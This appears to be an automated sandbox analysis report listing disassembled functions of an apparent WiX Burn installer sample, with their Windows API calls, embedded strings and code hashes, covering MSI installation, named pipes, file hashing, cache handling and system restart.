String ID: ACTION=ADMIN$ REBOOT=ReallySuppress$ REINSTALL=ALL$ REINSTALLMODE="vomus" REBOOT=ReallySuppress$%ls %ls=ALL$%ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress$Failed to add ADMIN property on admin install.$Failed to add feature action properties to argument string.$Failed to add feature action properties to obfuscated argument string.$Failed to add obfuscated properties to argument string.$Failed to add patch properties to argument string.$Failed to add patch properties to obfuscated argument string.$Failed to add properties to argument string.$Failed to add reboot suppression property on install.$Failed to add reboot suppression property on uninstall.$Failed to add reinstall all property on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on repair.$Failed to add the list of dependencies to ignore to the properties.$Failed to build MSI path.$Failed to enable logging for package: %ls to: %ls$Failed to get cached path for package: %ls$Failed to initialize external UI handler.$Failed to install MSI package.$Failed to perform minor upgrade of MSI package.$Failed to run maintanance mode for MSI package.$Failed to uninstall MSI package.$IGNOREDEPENDENCIES$VersionString$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$crypt32.dll$feclient.dll$msasn1.dll
API String ID: 0-2033600224
Opcode ID: 107289add9b3af97f364f4239a18a51e57afa28ca2c67d0a2e93bc92bee00ef6
Instruction ID: b1dc21fc02d2f94a98f74d6c9a475a3f60f3e158e1c561e8ffb9259df29e4a81
Opcode Fuzzy Hash: 107289add9b3af97f364f4239a18a51e57afa28ca2c67d0a2e93bc92bee00ef6
Instruction Fuzzy Hash: 99029271900666ABDF319F54CC85EE97FAAFB94700F0405A6F508A7252D732EEA1DF80

Function 005D1719 Relevance: 38.8, APIs: 21, Strings: 1, Instructions: 337COMMON

Download Yara Rule

APIs

InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 005D17B1
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005D17BB
CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 005D1808
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005D180E
CreateWellKnownSid.ADVAPI32(00000017,00000000,?,?), ref: 005D1848
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005D184E
CreateWellKnownSid.ADVAPI32(00000018,00000000,?,?), ref: 005D188E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005D1894
CreateWellKnownSid.ADVAPI32(00000010,00000000,?,?), ref: 005D18D4
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005D18DA
CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 005D191A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005D1920
SetEntriesInAclA.ADVAPI32(00000005,?,00000000,?), ref: 005D1A11
SetSecurityDescriptorOwner.ADVAPI32(?,?,00000000), ref: 005D1A4B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005D1A55
SetSecurityDescriptorGroup.ADVAPI32(?,?,00000000), ref: 005D1A8D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005D1A97
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 005D1AD0
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005D1ADA
CoInitializeSecurity.OLE32(?,000000FF,00000000,00000000,00000006,00000002,00000000,00003000,00000000), ref: 005D1B18
LocalFree.KERNEL32(?), ref: 005D1B2E

Strings

srputil.cpp, xrefs: 005D17DC

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLast$CreateKnownSecurityWell$Descriptor$Initialize$DaclEntriesFreeGroupLocalOwner
String ID: srputil.cpp
API String ID: 267631441-4105181634
Opcode ID: b825ce4362f5e0cd77fec9c496962acfd40041dc6dadf0bec40325a4cf49568f
Instruction ID: 2beb0801a680d092d71e5312a09857c81aaf1dc3ba6b362201e7de83b4643759
Opcode Fuzzy Hash: b825ce4362f5e0cd77fec9c496962acfd40041dc6dadf0bec40325a4cf49568f
Instruction Fuzzy Hash: 3DC16276D4163DABDB308B999C48BDEBEB8BF54750F0101ABA904B7250E7709E409FA4

Function 005BC332 Relevance: 37.1, APIs: 1, Strings: 20, Instructions: 376COMMON

Download Yara Rule

Strings

Failed to copy key for pseudo bundle payload., xrefs: 005BC3F3
Failed to allocate space for burn payload inside of related bundle struct, xrefs: 005BC3BE
Failed to copy repair arguments for related bundle package, xrefs: 005BC5D0
Failed to allocate space for burn package payload inside of related bundle struct, xrefs: 005BC385
Failed to append relation type to install arguments for related bundle package, xrefs: 005BC5A9
Failed to allocate memory for dependency providers., xrefs: 005BC6DE
Failed to copy install arguments for related bundle package, xrefs: 005BC584
Failed to append relation type to uninstall arguments for related bundle package, xrefs: 005BC644
Failed to copy filename for pseudo bundle., xrefs: 005BC417
Failed to copy display name for pseudo bundle., xrefs: 005BC74F
Failed to copy local source path for pseudo bundle., xrefs: 005BC43B
Failed to append relation type to repair arguments for related bundle package, xrefs: 005BC5F1
pseudobundle.cpp, xrefs: 005BC379, 005BC3B2, 005BC4A1, 005BC6D2
Failed to copy download source for pseudo bundle., xrefs: 005BC469
Failed to allocate memory for pseudo bundle payload hash., xrefs: 005BC4AD
Failed to copy version for pseudo bundle., xrefs: 005BC72D
Failed to copy key for pseudo bundle., xrefs: 005BC542
-%ls, xrefs: 005BC34C
Failed to copy cache id for pseudo bundle., xrefs: 005BC55F
Failed to copy uninstall arguments for related bundle package, xrefs: 005BC623

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID: -%ls$Failed to allocate memory for dependency providers.$Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of related bundle struct$Failed to allocate space for burn payload inside of related bundle struct$Failed to append relation type to install arguments for related bundle package$Failed to append relation type to repair arguments for related bundle package$Failed to append relation type to uninstall arguments for related bundle package$Failed to copy cache id for pseudo bundle.$Failed to copy display name for pseudo bundle.$Failed to copy download source for pseudo bundle.$Failed to copy filename for pseudo bundle.$Failed to copy install arguments for related bundle package$Failed to copy key for pseudo bundle payload.$Failed to copy key for pseudo bundle.$Failed to copy local source path for pseudo bundle.$Failed to copy repair arguments for related bundle package$Failed to copy uninstall arguments for related bundle package$Failed to copy version for pseudo bundle.$pseudobundle.cpp
API String ID: 1357844191-2832335422
Opcode ID: bf83fe01c288276a41248835d904739b47e83efcf0b24e0ab80edfbb35738e76
Instruction ID: 412788d44721848af49414a7087df64431eee81581cd0299b12d9ebe391e243a
Opcode Fuzzy Hash: bf83fe01c288276a41248835d904739b47e83efcf0b24e0ab80edfbb35738e76
Instruction Fuzzy Hash: 64C1B071A00656BBDF29DF28C885EAA7FA9FF48710B104529F915EB241DB70FC109BD8

Function 005945EE Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 141sleepshutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000020,?,00000001,00000000,?,?,?,?,?,?,?), ref: 00594617
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 0059461E
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 00594628
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00594678
GetLastError.KERNEL32 ref: 00594682
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 005946C6
GetLastError.KERNEL32 ref: 005946D0
Sleep.KERNEL32(000003E8), ref: 0059470C
InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,80040002), ref: 0059471D
GetLastError.KERNEL32 ref: 00594727
CloseHandle.KERNEL32(?), ref: 0059477D

Strings

Failed to get process token., xrefs: 00594656
user.cpp, xrefs: 0059464C, 005946A6, 005946F4, 0059475E
Failed to adjust token to add shutdown privileges., xrefs: 005946FE
SeShutdownPrivilege, xrefs: 0059466B
Failed to get shutdown privilege LUID., xrefs: 005946B0
Failed to schedule restart., xrefs: 00594768

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLast$ProcessToken$AdjustCloseCurrentHandleInitiateLookupOpenPrivilegePrivilegesShutdownSleepSystemValue
String ID: Failed to adjust token to add shutdown privileges.$Failed to get process token.$Failed to get shutdown privilege LUID.$Failed to schedule restart.$SeShutdownPrivilege$user.cpp
API String ID: 2241679041-1583736410
Opcode ID: 8569c5263f80641c7f5183765f210dab42f1f877af20078f82019b4ac22768a8
Instruction ID: 70c6158de5ade48d76ff93adbb457955e1c7190e5092a5f05be283076e7e18be
Opcode Fuzzy Hash: 8569c5263f80641c7f5183765f210dab42f1f877af20078f82019b4ac22768a8
Instruction Fuzzy Hash: 7641C77694122AEBEF305BE99C4EF6F7E59FB01B50F020127FE01B6280E7654D059AE1

Function 005A4EDF Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 165pipeCOMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD),00000001,?,00000000), ref: 005A4F0D
GetLastError.KERNEL32(?,00000000,?,?,0059452F,?), ref: 005A4F16
CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,?,?,00000000,?,?,0059452F,?), ref: 005A4FB8
GetLastError.KERNEL32(?,0059452F,?), ref: 005A4FC5
CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,00000000,?,?,?,?,?,?,?,0059452F), ref: 005A5040
GetLastError.KERNEL32(?,?,?,?,?,?,?,0059452F,?), ref: 005A504B
CloseHandle.KERNEL32(00000000,pipe.cpp,00000132,00000000,?,?,?,?,?,?,?,0059452F,?), ref: 005A508B
LocalFree.KERNEL32(00000000,?,0059452F,?), ref: 005A50B9

Strings

D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD), xrefs: 005A4F08
\\.\pipe\%ls.Cache, xrefs: 005A500C
Failed to allocate full name of cache pipe: %ls, xrefs: 005A5022
Failed to create pipe: %ls, xrefs: 005A4FF6, 005A507C
Failed to allocate full name of pipe: %ls, xrefs: 005A4F84
\\.\pipe\%ls, xrefs: 005A4F6E
Failed to create the security descriptor for the connection event and pipe., xrefs: 005A4F44
pipe.cpp, xrefs: 005A4F3A, 005A4FE9, 005A506F

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLast$CreateDescriptorNamedPipeSecurity$CloseConvertFreeHandleLocalString
String ID: D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD)$Failed to allocate full name of cache pipe: %ls$Failed to allocate full name of pipe: %ls$Failed to create pipe: %ls$Failed to create the security descriptor for the connection event and pipe.$\\.\pipe\%ls$\\.\pipe\%ls.Cache$pipe.cpp
API String ID: 1214480349-3253666091
Opcode ID: 00c110bdd9a6fe620fce4646fe4074d1b350659017d0c77abb6ed4f8dcfb1ed5
Instruction ID: 4b3f225cdefc68ef2a3ee4730bca5c739febb0d3431fc831323cf8205df84492
Opcode Fuzzy Hash: 00c110bdd9a6fe620fce4646fe4074d1b350659017d0c77abb6ed4f8dcfb1ed5
Instruction Fuzzy Hash: C851B172D41626FFDB219AA58C4AF9EBF64BF05720F110126FE10BA290E3B55E409ED0

Function 005CFA62 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 173encryptionfileCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000003,F0000040,00000003,00000000,00000000,005A9F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0), ref: 005CFAC7
GetLastError.KERNEL32 ref: 005CFAD1
CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?), ref: 005CFB0E
GetLastError.KERNEL32 ref: 005CFB18
CryptHashData.ADVAPI32(?,?,?,00000000), ref: 005CFB5F
ReadFile.KERNEL32(00000000,?,00001000,?,00000000), ref: 005CFB83
GetLastError.KERNEL32 ref: 005CFB8D
CryptDestroyHash.ADVAPI32(00000000), ref: 005CFBCA
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 005CFBE1
GetLastError.KERNEL32 ref: 005CFBFC
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 005CFC34
GetLastError.KERNEL32 ref: 005CFC3E
SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00008004,00000001), ref: 005CFC77
GetLastError.KERNEL32 ref: 005CFC85

Strings

cryputil.cpp, xrefs: 005CFBB1

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CryptErrorLast$Hash$ContextFile$AcquireCreateDataDestroyParamPointerReadRelease
String ID: cryputil.cpp
API String ID: 3955742341-2185294990
Opcode ID: 65ee803bc558c13d22456c6578c985d9a016d69e063d03eaf031667085c3b270
Instruction ID: 8e14fd8f74a332ce4565fca42f654fea619b7b506c19f5410f8378ef5e9aaa12
Opcode Fuzzy Hash: 65ee803bc558c13d22456c6578c985d9a016d69e063d03eaf031667085c3b270
Instruction Fuzzy Hash: 7E51C737E41139AFEB318A958C09FDA7F65BB04751F0240BABE48F6140D7B49D849BE0

Function 005A9E9E Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 181COMMON

Download Yara Rule

Strings

moving, xrefs: 005AA029
Failed to get cached path for package with cache id: %ls, xrefs: 005A9EC8
copying, xrefs: 005AA030, 005AA038
Failed to concat complete cached path., xrefs: 005A9EF4
Failed to transfer working path to unverified path for payload: %ls., xrefs: 005A9FA4
Failed to create unverified path., xrefs: 005A9F6E
Failed to move verified file to complete payload path: %ls, xrefs: 005AA06C
Failed to find payload: %ls in working path: %ls and unverified path: %ls, xrefs: 005A9FCB
Failed to reset permissions on unverified cached payload: %ls, xrefs: 005A9FF1

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID:
String ID: Failed to concat complete cached path.$Failed to create unverified path.$Failed to find payload: %ls in working path: %ls and unverified path: %ls$Failed to get cached path for package with cache id: %ls$Failed to move verified file to complete payload path: %ls$Failed to reset permissions on unverified cached payload: %ls$Failed to transfer working path to unverified path for payload: %ls.$copying$moving
API String ID: 0-1289240508
Opcode ID: 65271b62ea218be3e3f88de4afa9eec75461d8072b60dd481695182a925f3741
Instruction ID: d644685eb8cd1fa9031b520a888b38ea60e1662041776ca7d1f18501d1f22f8b
Opcode Fuzzy Hash: 65271b62ea218be3e3f88de4afa9eec75461d8072b60dd481695182a925f3741
Instruction Fuzzy Hash: 0F516E3194012AFBDF236A94CC0AFAD7F76BF55740F104152FA00B52A1E7729E60EB91

Function 005962AA Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 144COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C), ref: 005962F8
GetLastError.KERNEL32 ref: 00596302

Strings

variable.cpp, xrefs: 00596326
Failed to set variant value., xrefs: 00596423
Failed to get OS info., xrefs: 00596330

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLastVersion
String ID: Failed to get OS info.$Failed to set variant value.$variable.cpp
API String ID: 305913169-1971907631
Opcode ID: 726c0f33df7e157a7ca725ff06f8167702e7949dd9708f491122dc830135d2e2
Instruction ID: cb0453f4c82d963837b6d0ae023e4f71a8e3d5cf8200bf56159816c0b62afac4
Opcode Fuzzy Hash: 726c0f33df7e157a7ca725ff06f8167702e7949dd9708f491122dc830135d2e2
Instruction Fuzzy Hash: F041A471A01228ABDF309B99CC49EEF7FB8FB85750F00095AF505E7140D6309E44DB91

Function 005CFEC6 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 132threadtimeCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(005FB5FC,00000000,?,?,?,?,005B12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 005CFEF4
GetCurrentProcessId.KERNEL32(00000000,?,005B12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 005CFF04
GetCurrentThreadId.KERNEL32 ref: 005CFF0D
GetLocalTime.KERNEL32(8007139F,?,005B12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 005CFF23
LeaveCriticalSection.KERNEL32(005FB5FC,005B12CF,?,00000000,0000FDE9,?,005B12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 005D001A

Strings

$e_, xrefs: 005CFF61
(e_, xrefs: 005CFF5A
,e_, xrefs: 005CFF53
%ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 005CFFC0
0e_, xrefs: 005CFF70

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
String ID: $e_$%ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls$(e_$,e_$0e_
API String ID: 296830338-3004537678
Opcode ID: d198e2656ee04a3309fb9fe641d81056bf745531b46db7767126b191230bdead
Instruction ID: 5c58deff010094b35ca9236ba32c67430e42e6366433c3ce26be73b71039032b
Opcode Fuzzy Hash: d198e2656ee04a3309fb9fe641d81056bf745531b46db7767126b191230bdead
Instruction Fuzzy Hash: 78416171901119EFDF219FE8D809BBEBBB5FB18B11F14012AF500E6290D7389D44DBA1

Function 00596037 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 107timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 00596062
GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 00596076
GetLastError.KERNEL32 ref: 00596088
GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000000,?,00000000), ref: 005960DC
GetLastError.KERNEL32 ref: 005960E6

Strings

Failed to get the required buffer length for the Date., xrefs: 005960AD
variable.cpp, xrefs: 005960A3, 00596101
Failed to set variant value., xrefs: 00596124
Failed to allocate the buffer for the Date., xrefs: 005960C4
Failed to get the Date., xrefs: 0059610B

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: DateErrorFormatLast$SystemTime
String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$variable.cpp
API String ID: 2700948981-3682088697
Opcode ID: e216cc8f74f8068ce7ce60122708fb708b424df830e017496908af7a1b32a838
Instruction ID: 2f460f833f2884494c508a7fe5c999785c598dbd32f478390de0090de5827c6a
Opcode Fuzzy Hash: e216cc8f74f8068ce7ce60122708fb708b424df830e017496908af7a1b32a838
Instruction Fuzzy Hash: 1931CD32A4122AABDF219BE98C46EAF7F78BB44710F110427FF00F7281D6619D44D6E1

Function 005A9B43 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,00000000,?,*.*,?,?,?,00000000,.unverified,?), ref: 005A9BF2
lstrlenW.KERNEL32(?), ref: 005A9C19
FindNextFileW.KERNEL32(00000000,00000010), ref: 005A9C79
FindClose.KERNEL32(00000000), ref: 005A9C84

Part of subcall function 00593CC4: GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 00593D40
Part of subcall function 00593CC4: GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00593D53

Strings

.unverified, xrefs: 005A9B86
*.*, xrefs: 005A9BCC

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: FileFind$AttributesCloseErrorFirstLastNextlstrlen
String ID: *.*$.unverified
API String ID: 457978746-2528915496
Opcode ID: f907537c1ad2fc5b80397429180a0d43b9815048d900d82076df4a9e2a64a0e9
Instruction ID: 4ae6012dd08826753f215aa8020357998acd9a468de69f3ecb4ac7cb5c531fce
Opcode Fuzzy Hash: f907537c1ad2fc5b80397429180a0d43b9815048d900d82076df4a9e2a64a0e9
Instruction Fuzzy Hash: C5417F3090193DAEDB21AB64DD5DBEE7BB8BF85311F0041A6E908E10A0EB719EC4DF54

Function 005D887B Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000001,00000000), ref: 005D88D0
SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 005D88E2

Strings

%04hu-%02hu-%02huT%02hu:%02hu:%02huZ, xrefs: 005D88B9
%04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u, xrefs: 005D892D
feclient.dll, xrefs: 005D88AA
crypt32.dll, xrefs: 005D88A0

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Time$InformationLocalSpecificSystemZone
String ID: %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u$%04hu-%02hu-%02huT%02hu:%02hu:%02huZ$crypt32.dll$feclient.dll
API String ID: 1772835396-1985132828
Opcode ID: 2265bc7f784ff5b35e6f95e4abba9f1849f37b7ed459391e8a179723abf81efe
Instruction ID: 5eb1bb6940c4051117bff839a8003df2cc3d4e52d882d2b84d0aa95501bf5e6e
Opcode Fuzzy Hash: 2265bc7f784ff5b35e6f95e4abba9f1849f37b7ed459391e8a179723abf81efe
Instruction Fuzzy Hash: CF212AA6901129EADB20DB99DC05EBFB7FCBB5CB11F004556B945D2180E7389A84D770

Function 005CAA0E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 005CAB54

Strings

1#SNAN, xrefs: 005CBD53
1#QNAN, xrefs: 005CBD5A
1#INF, xrefs: 005CBD61
1#IND, xrefs: 005CBD4C

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: c33a94314989623f766c9de35c6d1c037b28fc942838ee67cee13829e2cbbf1a
Instruction ID: baafb7d47358d93dcc8311810f7f1fed40b5410458c4f1d6e873f7d781c6283a
Opcode Fuzzy Hash: c33a94314989623f766c9de35c6d1c037b28fc942838ee67cee13829e2cbbf1a
Instruction Fuzzy Hash: 77C23971E046298FEB25CE689D45BEABBB5FB84304F1445EED40DE7240E778AE818F41

